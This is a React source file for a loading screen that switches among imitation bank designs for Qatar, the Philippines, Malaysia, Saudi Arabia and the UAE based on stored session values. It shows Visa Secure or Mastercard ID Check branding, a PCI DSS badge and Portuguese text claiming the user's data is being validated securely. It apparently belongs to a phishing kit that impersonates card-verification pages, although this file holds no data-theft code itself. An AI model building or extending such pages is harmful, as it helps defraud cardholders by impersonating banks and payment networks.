import React from 'react';
import { isQatarBankDesign } from './qatar/QatarBankLayout';
import { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import { isMalaysiaBankDesign } from './malaysia/MalaysiaBankLayout';
import { isKsaBankDesign } from './ksa/KsaBankLayout';
import { isUaeBankDesign } from './uae/UaeBankLayout';
import QatarLoading from './QatarLoading';
import UaeLoading from './uae/UaeLoading';
import { getTranslation } from '../Utils/i18n';
import { isMastercard } from '../Utils/cardScheme';
import './Loader.css';

export default function LoadingPage({ config }) {
  const mode = config?.mode || localStorage.getItem('session_mode') || ((typeof process !== 'undefined' && process.env.REACT_APP_MODE) || undefined) || 'standardPT';
  const t = getTranslation(mode);
  const isRtl = t.dir === 'rtl';
  const design = localStorage.getItem('session_design') || 'standard_visa';

  const isQatar = isQatarBankDesign(design);
  const isPH = isPhilippinesBankDesign(design);
  const isMY = isMalaysiaBankDesign(design);
  const isKSA = isKsaBankDesign(design);
  const isUae = isUaeBankDesign(design);
  const isMc = isMastercard(design);

  if (isUae) {
    return <UaeLoading scheme={isMc ? 'mastercard' : 'visa'} />;
  }

  if (isQatar || isPH || isMY || isKSA) {
    return <QatarLoading isRtl={isRtl} scheme={isMc ? 'mastercard' : 'visa'} />;
  }

  const imageSrc = isMc ? '/images/manual/master.jpg' : '/images/manual/visa.jpg';
  const altText = isMc ? 'Mastercard ID Check' : 'Visa Secure';

  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-white" style={{ minHeight: '100vh', display: 'flex', alignItems: 'center', justifyContent: 'center', backgroundColor: '#ffffff' }}>
      <div className="w-full max-w-sm px-6 py-8 bg-white border border-neutral-300 rounded-xl shadow-sm" style={{ maxWidth: '24rem', width: '100%', padding: '2rem 1.5rem', backgroundColor: '#ffffff', border: '1px solid #e5e7eb', boxSizing: 'border-box' }}>
        <div className="flex flex-col items-center justify-between w-full mb-4" style={{ display: 'flex', flexDirection: 'column', alignItems: 'center', width: '100%' }}>
          <img
            src="/images/manual/pci.jpg"
            alt="Certificado de Segurança PCI DSS"
            className="h-12"
            style={{ height: '3rem', marginBottom: '1.25rem' }}
            onError={(e) => { e.target.style.display = 'none'; }}
          />

          <div className="my-6 mb-6 cus-loader" style={{ margin: '1.5rem 0' }}></div>

          <p style={{ fontSize: '0.9rem', fontWeight: 600, color: '#1e293b', textAlign: 'center', marginBottom: '0.25rem' }}>
            {t.processingTitle || 'Processando sua solicitação'}
          </p>
          <p style={{ fontSize: '0.78rem', color: '#64748b', textAlign: 'center', marginBottom: '1.5rem' }}>
            {t.processingDesc || 'Aguarde enquanto validamos seus dados com segurança...'}
          </p>

          {imageSrc && (
            <img
              src={imageSrc}
              alt={altText}
              className="h-12"
              style={{ height: '2.75rem' }}
              onError={(e) => { e.target.style.display = 'none'; }}
            />
          )}
        </div>
      </div>
    </div>
  );
}
